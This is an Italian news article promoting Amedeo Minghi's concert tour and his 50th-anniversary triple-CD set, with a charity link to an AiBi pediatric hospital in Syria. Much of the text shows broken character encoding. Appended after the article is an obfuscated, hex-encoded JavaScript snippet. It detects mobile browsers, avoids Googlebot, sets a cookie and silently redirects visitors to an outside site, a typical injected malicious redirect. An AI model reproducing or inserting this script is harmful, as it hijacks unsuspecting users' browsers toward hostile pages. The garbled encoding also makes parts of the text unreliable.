News

Amedeo Minghi il 31 gennaio al Teatro Nuovo di Milano inizia il tour del suo concerto spettacolo

a�?Lo vedremo parlare, cantare, ballare, suonare, viverea�?… questa postilla accompagna i manifesti pubblicitari del nuovo concerto spettacolo di Amedeo Minghi, a Milano, martedA� 31 gennaio alle ore 21 al Teatro Nuovo.

Nella tappa milanese, Amedeo Minghi sostiene il progetto di AiBi (Amici dei Bambini) Non lasciamoli Soli a�� Siria che prevede , tra le altre attivitA�, la realizzazione di un Ospedale pediatrico dentro la collina al riparo dalle bombe. La��evento A? patrocinato dal Comune di Milano, Assessorato alle Politiche Sociali, Salute e Diritti (Assessore Pierfrancesco Majorino).

Un tour A? il naturale seguito del successo ottenuto dal cofanetto di nuove canzoni distribuito dalla Sony e uscito (metA� ottobre) in concomitanza dei 50 anni di carriera che l’artista festeggia con la musica: a�?La bussola e il cuorea�?.

Un melodista visionario. Uno dei piA? grandi autori e interpreti della nostra canzone, con una personalitA� romantica, da sognatore, che spesso, come A? accaduto in passato, supera le mode contingenti per offrire al pubblico opere che non seguono logiche di mercato, ma sono semmai contraddistinte da uno stile personale da��interpretazione dall’alto profilo comunicativo. Amato da piA? generazioni, grazie alla composizione di melodie d’indescrivibile bellezza che creano ponti tra la gente.

Pensando a te A? il secondo singolo estratto dal cofanetto Sony, lanciato dal 23 gennaio 2017, attraverso uno spumeggiante videoclip live: A�Un video girato con la complicitA� di numerosissimi fan e dello stesso Amedeo – confida il giovane regista Michele Vitiello – sarA� un modo nuovo di interpretare la melodia di Minghi, che fra l’altro in questa canzone, invita proprio alla socialitA� del fare amorosoA�. Conclude il regista che ha curato gli ultimi videoclip di successo del melodista italiano.

Una melodia fresca, brillante, graffiante; una canzone dal forte potere aggregativo, in cui la positivitA� del pensiero d’amore coinvolge e travolge tutti. Ogni azione diventa allora manifestazione dell’emozione stessa, una sorta di prolungamento empatico del nostro pensiero. a�?E siamo in tanti, amarsi A? bellissimoa�?, ecco che nel ritornello si rintraccia la sferzata di novitA� che permea questo brano. Amedeo Minghi consegna al pubblico una canzone che dell’amore ritrae gli aspetti affascinanti di una pluralitA� cangiante verso piA? direzioni, attraverso metafore dirette e semplici che vanno a smaltare l’impianto melodico trascinante e arioso.

A�In occasione dei miei cinquanta��anni di carriera, – dichiara Amedeo Minghi – avevo la necessitA� di far ascoltare ciA? che sono oggi con nuove canzoni, ma nello stesso tempo, senza toni celebrativi, riconsiderare la mia esperienza musicale. Durante questo concerto spettacolo – aggiunge l’artista a�� racconterA? di questo mio ultimissimo lavoro, muovendomi dentro questi tre cd, che, come tre satelliti, orbitano intorno a ciA? che A? il mio mondo musicale, fatto di tante occasioni e percorsi. Questo lavoro mette in luce una profonditA� espressiva che si rintraccia nei miei provini inediti, nella��inconsapevolezza di canzoni che hanno resistito al tempo e nello stesso tempo, il piacere di condividere nuovi brani ora, da teatrante, quale mi definisco, – sorride – A? il momento di vederli in scenaA�.

Immagini, balletti, musicisti, accompagneranno in tour Amedeo per dare corpo alla messa in scena dei tre cd: La bussola, le nuove dimensioni musicali; il cuore, i ricordi di sempre, le canzoni piA? celebri e il percorso della fede; mappe, un vero e proprio zibaldone della melodia firmata da Minghi.

Da gennaio la��artista toccherA� le principali cittA� italiane: il 28 a Foligno (Auditorium San Domenico) e il 31 a Milano (Teatro Nuovo), e poi il 6 marzo a Torino (Teatro Colosseo), la��8 marzo a Gallipoli (Teatro Italia), la��11 marzo a Trento (Audiorium Santa Chiara), il 17 marzo ad Asti (Teatro Alfieri) e il 25 marzo a Mestre (Teatro del corso), 10 aprile a Napoli (Teatro Diana), 27 aprile a Gaeta (Teatro Ariston).

Inoltre, come moti spontanei, nascono tributi dei fan al melodista, i a�?Minghidaya�?; ci sono giA� state le tappe di Roma, Napoli, Milano, Civitavecchia, Capua, Caserta, Ascoli Piceno. Con il nuovo anno prevista l’11 febbraio una tappa al Parco dei Tigli (Folignano) e una il 25 febbraio all’hotel Carlton (Bologna).

LA BUSSOLA E IL CUORE a�� triplo cd a�� triplo vinile . Distribuito dalla SONY .

La storia del disco

A? un progetto che mette un punto e a capo nella carriera di Amedeo Minghi, questo “La bussola il cuore”, cofanetto che ripercorre i 50 anni di carriera del cantautore in 3 cd con LA BUSSOLA: 10 canzoni inedite. IL CUORE: 5 grandi classici e il percorso inedito della Fede. MAPPE: vecchi successi e chicche: dal 1966 (anno in cui uscA� il 45 giri “Alla fine/Ma per fortuna”, con testi di Mogol) agli anni ottanta “La bussola e il cuore” arriva a due anni di distanza dall’ultimo disco di Amedeo Minghi, “Suoni tra ieri e domani”.

“Questo lavoro mette in luce una profonditA� espressiva che si rintraccia nei miei provini inediti, nell’inconsapevolezza di canzoni che hanno resistito al tempo e il piacere di condividere nuovi brani che seguono esclusivamente le logiche del mio istinto”, dice lui presentando il progetto. “La bussola e il cuore” A? articolato in tre filoni ben distinti, che corrispondono – appunto – ai 3 cd: “La bussola”, “Il cuore” e “Mappe”: si tratta di tre “satelliti” (come compaiono sulla copertina) che ruotano tutti intorno ad un pianeta, la carriera di Minghi, anche se con velocitA� diversa.

‘La bussola e il cuore’ A? articolato in tre lavori ben distinti: ‘La bussola’, ‘Il cuore’ e ‘Mappe’. ‘La bussola’ A? il nuovo album (a 11 anni di distanza dal precedente) : 10 brani, due dei quali firmati a quattro mani con Mogol, che raccontano un viaggio nella��anima, dove il fascino A? piA? nel viaggio stesso che nella meta. Per dare poi nuova intensitA� a brani che, per sorte, sono diventati nel tempo dei classici e peculiari di un percorso, ecco ‘Il cuore’, che raccoglie cinque classici del repertorio di Minghi, totalmente riarrangiati e rivisitati in studio, e brani inediti che appartengono al suo percorso di Fede.

‘Mappe’ A? il terzo cd, il piA? trasversale, e racchiude venti brani registrati tra i primi anni Settanta e la prima metA� degli anni Ottanta, incisioni originali in cui si percepirA�, soprattutto in alcune, la puntina che tocca il solco del vinile. RaritA�, inediti, provini, curiositA�: un mondo di canzoni mai pubblicate, alcune scritte per altri artisti, altre che, invece, hanno trovato spazio nel repertorio di grandi interpreti, altre ancora tralasciate per logiche discografiche del tempo, senza dimenticare i provini di alcuni dei brani piA? famosi di Minghi.

Ad esempio il provino inedito, della modernissima a�?Il geniaccio degli italiania�?, composta con il compianto Gaio Chiocchio, con cui Minghi firmA? negli anni a��80 brani di indescrivibile bellezza, delle vere e proprie sceneggiature in cui la melodia racconta quanto le parole (qui anche, fra gli altri, il provino de ‘La breccia’, una delle ultime canzoni scritte insieme). La prova in studio di ‘Telecomunicazioni sentimentali’ ci riporta ad un Minghi tuttofare che, con la voce, A? in grado di simulare perfettamente la traccia della batteria e le armonizzazioni.

Tante le curiositA� da scoprire: un brano scritto per Gabriella Ferri, ‘Nun ce la��ho’, e che non interpretA? mai; ‘Il coraggio di tornare’, firmata con Franco Califano; ‘Sicura’, che uscA� per I Pandemonium, e ‘Ti perdo e non vorrei’, per Rita Pavone.

Da qui parte ‘La bussola e il cuore’, un progetto speciale e articolato, il primo pubblicato con Sony Music, “che si A? accostata con garbo e attenzione a questo mio modo di sentire la musica”, ci tiene a sottolineare Amedeo Minghi.

“Con Paolo Maiorino e collaboratori ci siamo ritrovati negli intenti, nell’emozione di vedere crescere questo progetto insieme, e pertanto hanno fatto scelte coraggiose che il pubblico sta giA� apprezzando. Avere al fianco una realtA� internazionale che guarda avanti A? stato per me un valore determinante”. Un lavoro che affascinerA� certamente il grande pubblico e i collezionisti piA? esigenti: meticolosa A? stata l’attivitA� di produzione in studio, infatti, per realizzare il nuovo materiale e grande il lavoro di ricerca musicale in archivio.

In vista del concerto-spettacolo di Milano, dichiara Andrea Moroni, Responsabile Cooperazione Internazionale di AiBi a�?La��ospedale di AiBi sarA� in una posizione strategica, raggiungibile da circa 450.000 civili, tra mamme e bambini: si svilupperA� su una superficie di circa 2000 mq, scavati nella collina e 300 mq fuori, offrendo servizi di emergenza, cosA� come reparti di pediatria, ginecologia e servizi ostetrici per 300 pazienti al giorno. I posti letto disponibili saranno 35 e sono disponibili 19 incubatrici. Ringraziamo Amedeo Minghi perchA�, con la sua sensibilitA�, tiene accesi i riflettori sui bambini siriani, che di tutto hanno bisogno tranne il disinteresse e la��indifferenza di tutti noia�?.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}